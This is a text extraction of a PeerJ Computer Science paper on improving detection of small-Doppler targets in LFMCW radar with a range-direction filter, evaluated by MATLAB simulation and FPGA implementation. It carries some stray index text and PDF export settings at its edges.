http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://dx.doi.org/10.7717/peerj.148 http://dx.doi.org/10.7717/peerj-cs.1 Achieving human and machine accessibility of cited data in scholarly publications Introduction Background Why cite data? The eight core Principles of data citation Implementation questions arising from the JDDCP Recommendations for Achieving Machine Accessibility What is machine accessibility? Unique identification Landing pages Content encoding on landing pages Best practices for dataset description Serving the landing pages Persistence guarantees Implementation: Stakeholder Responsibilities Conclusion Acknowledgements Appendix Serving landing pages: implementation details Serving landing pages: linking to the data References work_jzdt3do5o5akfmhwn2s6ucbalu ---- Enhancement of small doppler frequencies detection for LFMCW radar Enhancement of small doppler frequencies detection for LFMCW radar Sameh Ghanem Electronics and Communications, Egyptian Academy for Engineering and Advanced Technology (EAEAT), Cairo, Al Qahirah, Egypt ABSTRACT Detection of targets with small Doppler frequencies of linear-frequency modulated continuous wave radars is the main task of this article. The moving target indicator (MTI) is used to reject the fixed targets and high-speed targets through the radar research area. In this work, targets with small Doppler frequencies can be detected perfectly based on the frequency response of a single delay line canceller followed by single delay line integrator. An enhancement of the proposed algorithm is achieved using a filter in the range direction of the range-Doppler processor scheme. The proposed filter is chosen with certain coefficients after the first fast Fourier transform processor in range to enhance the radar performance. The evaluation of the proposed algorithm is achieved at different slow Doppler scenarios of the target and compared with the traditional algorithm which uses only MTI processor. Another aspect that is important for evaluation of the proposed algorithm is the detection performance of the algorithms through the receiver operating characteristic curves. Implementation of the proposed algorithm using FPGA is performed in real time applications and it is found that it meets the simulation results. Subjects Adaptive and Self-Organizing Systems, Algorithms and Analysis of Algorithms, Digital Libraries, Optimization Theory and Computation Keywords LFMCW radar, SDLC–MTI, Doppler frequency, 2D-FFT, Signal processing INTRODUCTION Detection of slow moving targets is an important for linear-frequency modulated continuous wave (LFMCW) radars based on traditional techniques such as fast Fourier transform (FFT) in both range and Doppler directions (Skolnik, 2008). Usage of FMCW radar due to many advantages such as its small weight, small energy consumption and less hardware complexity relative to other radars (Lee & Kim, 2010). The target information such as range and speed can be extracted from LFMCW radars using two- dimensional FFT algorithm. The moving target indicator (MTI) is used to distinguish between the fixed and moving targets. There are many researches that enhance the detection of LFMCW radars using different techniques. In Salem et al. (2015), target detection of LFMCW radars is enhanced using Compressive Sensing theory in Doppler direction. In Salem et al. (2016), the authors investigate the real time implementation of the proposed algorithm for LFMCW radar. An enhancement of target detection in both range and Doppler directions based on CS is shown in Hossiny et al. (2018). In Ahmed (2019), the author enhances the detection of slow Doppler frequencies based on frequency response of both the single delay line canceller (SDLC) and integrator. The authors in How to cite this article Ghanem S. 2021. Enhancement of small doppler frequencies detection for LFMCW radar. PeerJ Comput. Sci. 7: e367 DOI 10.7717/peerj-cs.367 Submitted 27 October 2020 Accepted 31 December 2020 Published 28 January 2021 Corresponding author Sameh Ghanem, samehghanem@eaeat.edu.eg Academic editor Tawfik Al-Hadhrami Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.367 Copyright 2021 Ghanem Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.367 mailto:samehghanem@�eaeat.�edu.�eg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.367 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Winkler (2007), achievement of Range-Doppler detection of automotive FMCW radar is performed to extract the target information based on FFT calculations. In this article, an enhancement of small Doppler target detection is achieved using a proposed filter in range direction of FFT processor. The evaluation of the proposed processor has performed using MATLAB simulation and receiver operating characteristic (ROC) curves. Implementation of the proposed processor is designed and tested using FPGA. The organization of this paper is achieved as follows; after the introduction, “LFMCW Radar Detection and Processing” introduces a review on LFMCW radar processing and detection. “The Proposed Processor” illustrates on the operation of the proposed processor. Experimental results using MATLAB is illustrated in “Computer Simulation”. “Hardware Implmentation” presents the hardware implementation of the proposed processor using FPGA. Finally, the conclusion comes in “Conclusion”. LFMCW RADAR DETECTION AND PROCESSING The general block diagram of LFMCW radar is shown as in Fig. 1. It consists of a transmitter, a receiver, mixer, and Analog-to-Digital converter (A/D). The received radar signal is processed after digitization using A/D converter in the form of base band signal. The target decision is made using the constant false alarm rate (CFAR) algorithm after Range-Doppler processing based on FFT. The transmitted signal of an FMCW radar can be modulated as follow (Levanon & Mozeson, 2004): ST tð Þ ¼ ATcos 2pfct þ 2p Zt 0 fT tð Þdt 0 @ 1 A (1) Where fT tð Þ ¼ BT :t is the linear transmitted frequency as function of time, fc is the carrier frequency, B is the bandwidth, AT is the transmitted signal amplitude, and T is the time duration. The received signal after reflection with delay of td ¼ 2: RoþvtC and Doppler shift of fD ¼ �2: fcvC , the received frequency can be expressed as: fR tð Þ ¼ B T t � tdð Þ þ fD (2) Where Ro is the initial target range and v is the target velocity. Figure 1 General block diagram of LFMCW radar. Full-size DOI: 10.7717/peerj-cs.367/fig-1 Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 2/14 http://dx.doi.org/10.7717/peerj-cs.367/fig-1 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ The received radar signal can be expressed as: SR tð Þ ¼ ARcos � 2pfc t � tdð Þ þ 2p Zt 0 fR tð Þdt � ¼ ARcos 2pfc t � tdð Þ þ B T 1 2 t2 � td:t � � þ fD:t � � (3) Where AR represents the received signal amplitude. The target information can be obtained by mixing the transmitted and received signals in time domain and filtered using low-pass filter (LPF) to generate the intermediate frequency (IF) signal SIF(t) as: SIF tð Þ ¼ 1 2 cos 2p fc : 2Ro C � � þ 2p � 2Ro C : B T þ 2fcv C � � t � � (4) The sign ± represents up and down ramp respectively. Therefore, beat frequency (fb) can be obtained in the spectrum of the baseband signal as: fb ¼ � 2Ro C : B T þ 2fcv C (5) The relation between the beat frequency (fb) and range (R) for fixed target is given by Komarov & Smolskiy (2003) and Levanon & Mozeson (2004) fb ¼ 2RfmΔF C (6) Where fm is the modulated frequency, Δf is the receiver bandwidth and C is speed of light. Extraction of target information such as range and speed based on 2D-FFT is illustrated as shown in Fig. 2. According to the traditional algorithm for LFMCW radar, the spectrum of received radar signal is processed using FFT in range direction followed by FFT in Doppler direction. The output of second FFT is applied to CFAR processor to make a decision for target detection. One of enhancement method for target detection using SDLC-MTI followed by integrator (Ahmed, 2019) is illustrated in Fig. 3. The frequency response of SDLC MTI is multiplied with that of Single Delay Line Integrator (SDLI) as shown in Fig. 4. Figure 5A represents the realization of stable SDLI and Fig. 5B illustrates its frequency response at different values of gain (A). This structure has a good performance for slowly targets with small Doppler frequencies but has a bad evaluation for middle Doppler targets. This problem has been enhanced in Ahmed (2019) but with combined structure of the traditional algorithm (MTI with 2D-FFT processor) and the SDLI with Doppler FFT as shown in Fig. 6. The problem of this combination is the complexity which uses extra Doppler FFT processor in addition to SDLI processor. This problem can be overcame using the proposed processor or filter instead of high complexity as discussed in the next section. Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 3/14 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ THE PROPOSED PROCESSOR Due to shortage of SDLC/SDLI algorithm in middle Doppler targets and expected high complexity in combination structure, the proposed processor is used to overcome this problem beside enhancement of off-pin targets as shown in Fig. 7. The integrator of SDLC/SDLI has a stabilization factor, A, of one to ensure the system stability and the proposed filter is used as window function which multiply the Figure 2 LFMCW radar signal processing using 2D-FFT. Full-size DOI: 10.7717/peerj-cs.367/fig-2 Figure 3 Block diagram of SDLC. Block diagram of SDLC/SDLI algorithm. Full-size DOI: 10.7717/peerj-cs.367/fig-3 Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 4/14 http://dx.doi.org/10.7717/peerj-cs.367/fig-2 http://dx.doi.org/10.7717/peerj-cs.367/fig-3 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ Figure 4 Single Delay Line Integrator Structure. (A) Stable realization. (B) Frequency response at different values of A. Full-size DOI: 10.7717/peerj-cs.367/fig-4 Figure 5 LFMCW radar processor based on SDLC. LFMCW radar processor based on SDLC/SDLI processor. Full-size DOI: 10.7717/peerj-cs.367/fig-5 Figure 6 Block diagram of LFMCW radar with the combined structure. Full-size DOI: 10.7717/peerj-cs.367/fig-6 Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 5/14 http://dx.doi.org/10.7717/peerj-cs.367/fig-4 http://dx.doi.org/10.7717/peerj-cs.367/fig-5 http://dx.doi.org/10.7717/peerj-cs.367/fig-6 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ incoming signal in time domain with the window function under consideration of same lengths. This multiplication in time domain can be obtained using convolution in frequency domain as in this case which spectral signal is more interest due to using FFT. The coefficients of the proposed filter is chosen to be 1 and −0.5 to solve the problem of middle Doppler frequencies. The proposed filter is chosen a head of first FFT processor which acts as a window function to ensure high detection capability before range-Doppler processor. The realization of this filter is illustrated as in Fig. 8. For the proposed filter, the difference equation can be written as: y nð Þ ¼ x nð Þ � 0:5x n � 1ð Þ (7) Where x(n) and y(n) represent the output of FFT processor and the output of the proposed filter respectively. The transfer function of the proposed filter can be written as: Y Zð Þ ¼ X Zð Þ 1 � 0:5Z�1 � � Figure 7 General block diagram of LFMCW radar using the proposed processor. Full-size DOI: 10.7717/peerj-cs.367/fig-7 Figure 8 Realization of the proposed filter processor. Full-size DOI: 10.7717/peerj-cs.367/fig-8 Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 6/14 http://dx.doi.org/10.7717/peerj-cs.367/fig-7 http://dx.doi.org/10.7717/peerj-cs.367/fig-8 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ Therefore, H Zð Þ ¼ 1 � 0:5Z�1 (8) The proposed filter is chosen to enhance the detection capability of middle Doppler target velocities which improved using maximization process in Ahmed (2019) with approximately high complexity compared with that of the proposed filter. The simulation of the proposed processor performance and both SDLC/SDLI processor and the traditional algorithm based on MTI only is achieved and discussed in the next section. COMPUTER SIMULATION Performance of the proposed processor is evaluated using simulation based on Matlab program. The performance is compared with that of both the traditional one and SDLC/SDLI algorithm under the same conditions. It is assumed that, the generation waveform is sawtooth with the central frequency of LFMCW radar (fc) is 24 GHz, bandwidth (B) is 20 MHz, modulation period (Tm) is 80 μsec, number of range cells is 1,024 cells and number of Doppler cells is 32 cells. Comparison between the proposed processor and the traditional one which uses 2D-FFT processor is achieved as shown in Fig. 9. To study the effect of the proposed filter, two scenarios could be applied. First one, for off-pin targets and the other for middle-pin targets. The simulation is performed for these cases under the same conditions to verify a fair comparison. Off-pin targets The proposed filter has a great performance on the off-pin target detection. Assume a target in Doppler velocity equals (4.5/15)fm which is off-pin target which lies between Doppler velocities (4/15)fm and (5/15)fm. The target can appear as two targets as in Fig. 10A using the traditional algorithm. But after applying the proposed filter, the target is located at one pin only (at pin number 5) or with Doppler velocity equals (5/15)fm as in Fig. 10B which indicates that, the proposed filter can resolve the problem of off-pin targets and therefore enhance the signal detection. Figure 9 Block diagram of the proposed processor compared with the traditional 2D-FFT processor. Full-size DOI: 10.7717/peerj-cs.367/fig-9 Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 7/14 http://dx.doi.org/10.7717/peerj-cs.367/fig-9 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ Middle-pin targets To evaluate the effect of the proposed filter on the traditional algorithm, a set of moving targets are presented at different Doppler frequencies in noiseless environment (1/32, 4/32, 8/32, 12/32, 16/32, 20/32, 24/32, 28/32, 31/32) × fm. Figure 11 illustrates SDLC/SDLI processor response compared with the traditional algorithm at different Doppler frequencies. It is found that, there are no enhancement in target detection especially for middle-pin targets. Figure 12 represents the response of the proposed algorithm based on the designed filter processor compared with the traditional one at different Doppler frequencies. It is clear that, the proposed processor based on filtering of the signal spectrum has a good performance for both off-pin targets and middle-pin targets compared with both the traditional and SDLC/SDLI processor due to using the maximization selection. Another aspect to evaluate the proposed processor is the detection performance using ROC curve at different Doppler frequencies as shown in Figs. 13 and 14. It is clear that, from Fig. 13, the detection performance of the proposed processor is enhanced compared with both the traditional and SDLC/SDLI processor by nearly 12 dB of SLC/SDLI processor and about 32 dB of the traditional algorithm at slow Doppler target velocity of (2/32)fm. Figure 14 illustrates that, the detection of the target enhanced Figure 10 Response of FFT algorithm. (A) Before the proposed filter. (B) After the proposed filter. Full-size DOI: 10.7717/peerj-cs.367/fig-10 Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 8/14 http://dx.doi.org/10.7717/peerj-cs.367/fig-10 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ using the proposed processor by nearly 38 dB of SLC/SDLI processor and about 10 dB of the traditional algorithm at middle Doppler target velocity of (12/32)fm. HARDWARE IMPLMENTATION The implementation of the proposed processor is very important using FPGA which indicates that it can operate in real-time applications. The implementation is designed for the processing stage which includes; dechirping process of swatooth signal, 2D-FFT processor, proposed filter, MTI, SDLC/SDLI and CFAR detection. Xilinx KC705 DSP kit is used for implementation which includes KINTEX7 XC7K325T FPGA chip which has 241,152 logic cell, 768 DSP slices and about 216 Kbit RAM (Challenges & Solutions, 2012). FPGA board is equipped with an FMC daughter board that contains TI’s ADS62P49/ ADS4249 dual-channel 14-bit 250 Msps ADC and TI’sDAC3283 dual channel 16-bit 800 Msps DAC on a daughter board (Abaco Systems, 2013). The FFT core parameters are Figure 12 Response of the proposed processor. Response of the proposed processor compared with the traditional one at different Doppler frequencies. Full-size DOI: 10.7717/peerj-cs.367/fig-12 Figure 11 Response of SDLC. Response of SDLC/SDLI processor compared with the traditional one at different Doppler frequencies. Full-size DOI: 10.7717/peerj-cs.367/fig-11 Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 9/14 http://dx.doi.org/10.7717/peerj-cs.367/fig-12 http://dx.doi.org/10.7717/peerj-cs.367/fig-11 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ Figure 14 ROC of the proposed processor for middle Doppler target. ROC of the proposed processor compared with that of SDLC/SDLI and the traditional algorithms for middle Doppler target at Pfa of 10−5. Full-size DOI: 10.7717/peerj-cs.367/fig-14 Figure 13 ROC of the proposed processor for slow Doppler target. ROC of the proposed processor compared with that of SDLC/SDLI and the traditional algorithms for slow Doppler target at Pfa of 10−5. Full-size DOI: 10.7717/peerj-cs.367/fig-13 Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 10/14 http://dx.doi.org/10.7717/peerj-cs.367/fig-14 http://dx.doi.org/10.7717/peerj-cs.367/fig-13 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ chosen to be; 32 number of samples, input data width is 32 bits, phase factor width is 24 bits, and Pipelined Streaming, I/O is used. The hardware implementation is performed for both the proposed processor and traditional algorithm which based on SDLC/SDLI. Two targets are simulated at Doppler velocity of pin (2/32) and the other target located at Doppler frequency pin number (12/32) as shown in Figs. 15 and 16. From these figures, it is clear that, the output of the proposed processor can improve the slowly moving Figure 16 Response of the proposed processor compared with that of both SDLC/SDLI and traditional algorithms using FPGA. Full-size DOI: 10.7717/peerj-cs.367/fig-16 Figure 15 Simulation results of target detection using FPGA. (A) Traditional algorithm. (B) Proposed processor. Full-size DOI: 10.7717/peerj-cs.367/fig-15 Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 11/14 http://dx.doi.org/10.7717/peerj-cs.367/fig-16 http://dx.doi.org/10.7717/peerj-cs.367/fig-15 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ target without any effect of other targets. The hardware specifications using Xilinx KC705 DSP kit is summarized in Table 1. The verification of the implementation is performed using Chip scope for the two processors as shown in Fig. 17. It is found that, the Chip scope results met the simulation results as discussed before. CONCLUSION In this article, detection of targets with small Doppler frequencies has been enhanced using a proposed processor. The enhancement has performed based on filtering process focusing on the detection based on the traditional algorithm using 2D-FFT processor and SDLC/SDLI processor. There are two main problems for target detection with small Doppler frequencies; first one, is the off-pin target detection which traditional algorithm cannot distinguish between these targets. The proposed processor can resolve this problem. Second problem, is the detection of middle-pin targets which is the main problem for SDLC/SDLI processor and this case has been overcame using maximization Table 1 FPGA utilization resources of the proposed processor. Hardware resources Available resources Used Utilization (%) Slice registers 326,080 20,697 5 Slice LUTs 203,800 43,723 21 RAMB36E1/FIFO36E1s 445 145 32 RAMB18E1/FIFO18E1s 890 33 3 DSP48E1s 840 345 40 Figure 17 Chip scope result of the proposed processor. Chip scope result of the proposed processor, SDLC/SDLI and traditional responses. Full-size DOI: 10.7717/peerj-cs.367/fig-17 Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 12/14 http://dx.doi.org/10.7717/peerj-cs.367/fig-17 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ process but it suffer from high complexity. So, this problem can be resolved using the proposed algorithm based on a proposed filter as a head of the first FFT processor with less complexity compared with maximization process. The performance of the proposed processor is examined compared with that of the traditional one and SDLC/SDLI processor through these two points. The detection performance of these targets can be evaluated using ROC curves at different target velocities and at low probability of false alarm. It is found that, the detection performance of the proposed processor is enhanced by nearly 12 dB of SLC/SDLI processor and about nearly 32 dB of the traditional algorithm at slow Doppler target velocity and about nearly 38 dB of SLC/SDLI processor and 10 dB of the traditional algorithm at middle-Doppler target velocity. The implementation of the proposed processor is achieved using FPGA and Chip scope. It is found that, it meets the simulation results. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Sameh Ghanem conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Code is available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.367#supplemental-information. REFERENCES Abaco Systems. 2013. FMC150 for digital signal processing. Austin: Abaco Systems. Ahmed FM. 2019. Detection of targets with small apparent doppler frequencies in LFMCW radars. In: IOP Conference Series: Materials Science and Engineering. Bristol: IOP Publishing Ltd, 12026. Challenges D, Solutions X. 2012. KINTEX-7 FPGA KC705 evaluation kit: versatile, high- performance base platform shortens time to market for 7 series designs. San Jose: Xilinx, Inc. Hossiny MH, Salem SG, Ahmed FM, Moustafa KH. 2018. Enhance LFMCW radar detection and complexity using adaptive recovery CAMP algorithm. In: First International Workshop on Deep and Representation Learning. Cairo. Piscataway: IEEE, 1–6. Komarov IV, Smolskiy SM. 2003. Fundamental of short range FM radar. Norwood: Artech House. Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 13/14 http://dx.doi.org/10.7717/peerj-cs.367#supplemental-information http://dx.doi.org/10.7717/peerj-cs.367#supplemental-information http://dx.doi.org/10.7717/peerj-cs.367#supplemental-information http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ Lee MS, Kim YH. 2010. Design and performance of a 24-GHz switch-antenna array FMCW radar system for automotive applications. IEEE Transactions on Vehicular Technology 59(5):2290–2297 DOI 10.1109/TVT.2010.2045665. Levanon N, Mozeson E. 2004. Radar signals. Hoboken: John Wiley & Sons, Inc. Salem SG, Ahmed FM, Ibrahim MH, Elbardawiny AH. 2015. A proposed compressive sensing based LFMCW radar signal processor. International Journal of Engineering Research & Technology 4(4):P611–P616. Salem SG, Ahmed FM, Ibrahim MH, Elbardawiny ARH, Elgayar S. 2016. Design and implementation of a new approach of LFMCW radar signal processing based on compressive sensing in azimuth direction. In: 2016 IEEE Radar Conference (RadarConf), Philadelphia, PA, Piscataway: IEEE, 1–6 DOI 10.1109/RADAR.2016.7485301. Skolnik MI. 2008. Introduction to radar systems. New York: Third Edition. Winkler V. 2007. Range doppler detection for automotive FMCW radars. In: European Radar Conference. Piscataway: IEEE, 10–12. Ghanem (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.367 14/14 http://dx.doi.org/10.1109/TVT.2010.2045665 http://dx.doi.org/10.1109/RADAR.2016.7485301 http://dx.doi.org/10.7717/peerj-cs.367 https://peerj.com/computer-science/ Enhancement of small doppler frequencies detection for LFMCW radar Introduction Lfmcw radar detection and processing The proposed processor Computer simulation Hardware implmentation Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op 